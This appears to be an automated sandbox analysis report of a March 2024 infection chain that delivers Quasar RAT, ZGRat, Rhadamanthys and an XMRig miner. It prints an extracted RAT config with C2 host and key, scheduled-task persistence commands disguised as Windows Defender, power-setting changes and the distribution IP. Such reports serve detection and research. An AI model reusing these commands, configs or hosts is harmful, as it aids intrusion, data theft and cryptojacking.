Resubmissions

18-03-2024 18:43

240318-xddhfafd78 10

18-03-2024 18:31

240318-w6jz9afh4s 10

18-03-2024 18:08

240318-wqytgaeg87 10

Analysis

  • max time kernel
    231s
  • max time network
    237s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    18-03-2024 18:08

General

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

gjhfhgdg.insane.wang:3634

Mutex

5943d26f-e34d-4af2-bb6f-9aa3b1840ec8

Attributes
  • encryption_key

    997411AC284CD97048B61F90B41B906864F1171B

  • install_name

    dfsdff.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    windows defender process

  • subdirectory

    fsfsf

Signatures

  • Detect ZGRat V1 1 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 3 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 14 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 6 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    PID:2416
      • C:\Windows\system32\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3880
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://94.156.66.151/
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4000
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97bd99758,0x7ff97bd99768,0x7ff97bd99778
        2⤵
        PID:3984
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1776 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:2
        2⤵
        PID:2804
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:4952
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:1332
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:1
        2⤵
        PID:3628
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3020 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:1
        2⤵
        PID:1584
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4360 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:3668
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:928
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4352 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:1
        2⤵
        PID:4700
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4940 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:3536
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4972 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5124
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4968 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:1
        2⤵
        PID:5200
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5316 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:1
        2⤵
        PID:5280
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5288 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5332
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4988 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5340
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4932 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5448
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4704 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5456
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5664
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5324 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5736
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3364 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5744
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5856
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5684 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5932
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5752 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5940
      • C:\Users\Admin\Downloads\ghfhhminfudk.exe
        "C:\Users\Admin\Downloads\ghfhhminfudk.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:5560
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:5632
              • C:\Users\Admin\AppData\Local\Temp\ijvcoeh.exe
                "C:\Users\Admin\AppData\Local\Temp\ijvcoeh.exe"
                4⤵
                • Executes dropped EXE
                PID:5556
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "windows defender process" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe" /rl HIGHEST /f
                    5⤵
                    • Creates scheduled task(s)
                    PID:1184
                  • C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe
                    "C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:4700
                      • C:\Windows\SYSTEM32\schtasks.exe
                        "schtasks" /create /tn "windows defender process" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe" /rl HIGHEST /f
                        6⤵
                        • Creates scheduled task(s)
                        PID:5560
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\hgjfhdgh"
            3⤵
            PID:1220
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hgjfhdgh\hgjfhdgh.exe'" /f
            3⤵
            PID:3480
              • C:\Windows\system32\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hgjfhdgh\hgjfhdgh.exe'" /f
                4⤵
                • Creates scheduled task(s)
                PID:5724
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd" /c copy "C:\Users\Admin\Downloads\ghfhhminfudk.exe" "C:\Users\Admin\AppData\Roaming\hgjfhdgh\hgjfhdgh.exe"
            3⤵
            PID:1612
      • C:\Users\Admin\Downloads\hghghjhfhleviticus.exe
        "C:\Users\Admin\Downloads\hghghjhfhleviticus.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:5904
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:6036
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5632 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5164
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5036 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:8
        2⤵
        PID:5144
      • C:\Users\Admin\Downloads\gfgghdhwhatsup.exe
        "C:\Users\Admin\Downloads\gfgghdhwhatsup.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        PID:5448
          • C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
            "C:\Users\Admin\AppData\Local\Temp\ghghghg.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            PID:3480
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                4⤵
                PID:6128
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                4⤵
                PID:6124
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                4⤵
                PID:5896
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                4⤵
                PID:6040
              • C:\Windows\explorer.exe
                explorer.exe
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SendNotifyMessage
                PID:5448
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\fgfdgd"
            3⤵
            PID:1196
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
            3⤵
            PID:5936
              • C:\Windows\system32\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                4⤵
                • Creates scheduled task(s)
                PID:6068
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd" /c copy "C:\Users\Admin\Downloads\gfgghdhwhatsup.exe" "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe"
            3⤵
            PID:5884
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2556 --field-trial-handle=1904,i,123868974064576822,2310964821097692026,131072 /prefetch:2
        2⤵
        PID:5960
  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
    1⤵
    PID:816
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3972 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
    1⤵
    PID:5176
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SendNotifyMessage
    PID:5444
  • C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
    C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
    1⤵
    • Executes dropped EXE
    PID:5128
  • C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    PID:6024
  • C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
    C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    PID:1352
      • C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
        "C:\Users\Admin\AppData\Local\Temp\ghghghg.exe"
        2⤵
        • Executes dropped EXE
        PID:3712
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                        3⤵
                                                                                          PID:3404
                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                          3⤵
                                                                                            PID:1104
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                            3⤵
                                                                                              PID:2596
                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                              3⤵
                                                                                                PID:5388
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\fgfdgd"
                                                                                              2⤵
                                                                                                PID:4528
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                2⤵
                                                                                                  PID:2464
                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                    3⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:2308
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe"
                                                                                                  2⤵
                                                                                                    PID:1904
                                                                                                • C:\Windows\System32\rundll32.exe
                                                                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                  1⤵
                                                                                                    PID:836
                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:2056
                                                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe.config
                                                                                                      2⤵
                                                                                                      • Opens file in notepad (likely ransom note)
                                                                                                      PID:5464
                                                                                                  • C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                    1⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4116
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\ghghghg.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3320
                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                        3⤵
                                                                                                          PID:5380
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                          3⤵
                                                                                                            PID:1176
                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                            3⤵
                                                                                                              PID:4452
                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                              3⤵
                                                                                                                PID:2252
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\fgfdgd"
                                                                                                              2⤵
                                                                                                                PID:5388
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                                2⤵
                                                                                                                  PID:6028
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                                    3⤵
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:3660
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe"
                                                                                                                  2⤵
                                                                                                                    PID:5304
                                                                                                                • C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\fsfsf\dfsdff.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1184
                                                                                                                • C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3904
                                                                                                                • C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4856
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ghghghg.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\ghghghg.exe"
                                                                                                                    2⤵
                                                                                                                      PID:5836
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\fgfdgd"
                                                                                                                      2⤵
                                                                                                                        PID:428
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                                        2⤵
                                                                                                                          PID:5376
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                                                                                                            3⤵
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:5096
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          "cmd" /c copy "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\Admin\AppData\Roaming\fgfdgd\fgfdgd.exe"
                                                                                                                          2⤵
                                                                                                                            PID:5676

Network

• [NL] GET http://94.156.66.151/
  chrome.exe
  Remote address: 94.156.66.151:80
  Request
  GET / HTTP/1.1
  Host: 94.156.66.151
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Response
  HTTP/1.1 200 OK
  Date: Mon, 18 Mar 2024 18:10:14 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
  Content-Length: 1873
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html;charset=UTF-8
• [NL] GET http://94.156.66.151/icons/blank.gif
  chrome.exe
  Remote address: 94.156.66.151:80
  Request
  GET /icons/blank.gif HTTP/1.1
  Host: 94.156.66.151
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Referer: http://94.156.66.151/
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Response
  HTTP/1.1 200 OK
  Date: Mon, 18 Mar 2024 18:10:20 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
  Last-Modified: Sat, 20 Nov 2004 21:16:24 GMT
  ETag: "94-3e95722b75a00"
  Accept-Ranges: bytes
  Content-Length: 148
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: image/gif
• [US] DNS 76.32.126.40.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  76.32.126.40.in-addr.arpa
  IN PTR
  Response
